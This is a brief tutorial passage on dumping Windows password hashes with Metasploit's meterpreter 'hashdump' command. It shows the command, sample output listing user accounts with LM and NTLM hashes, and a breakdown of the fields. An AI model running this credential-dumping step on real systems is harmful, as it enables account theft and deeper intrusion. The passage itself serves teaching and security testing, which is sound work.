Metasploit: Finding Password in Windows Password Hash File
With the meterpreter shell session open
meterpreter > hashdump
The contents of the target system’s password hash file are output to the screen.
Administrator:500:CEEB0FA9F240C200417EAF40CFAC29C3:D280553F0103F2E643406517296E7582::: User1:1011:7584248B8D2C9F9EAAD3B435B51404EE:186CB09181E2C2ECAAC768C47C729904::: User2:1012:AC5BA6A944526699AAD3B435B51404EE:F07A9DFFFC2C5C7F9D9EBC83FD69D68E::: User3:1013:E7EED3F5C2C85B88AAD3B435B51404EE:6AA15B3D14492D3FA4AA7C5E9CDC0E6A:::<123
Each field is separated with colon. The fields are:
1st field: username (Administrator, User1, etc.)
2nd field: Relative Identification (RID): last 3–4 digits of the Security Identifier (SID), which are unique to each user
3rd field: LM hash
4th field: NTLM hash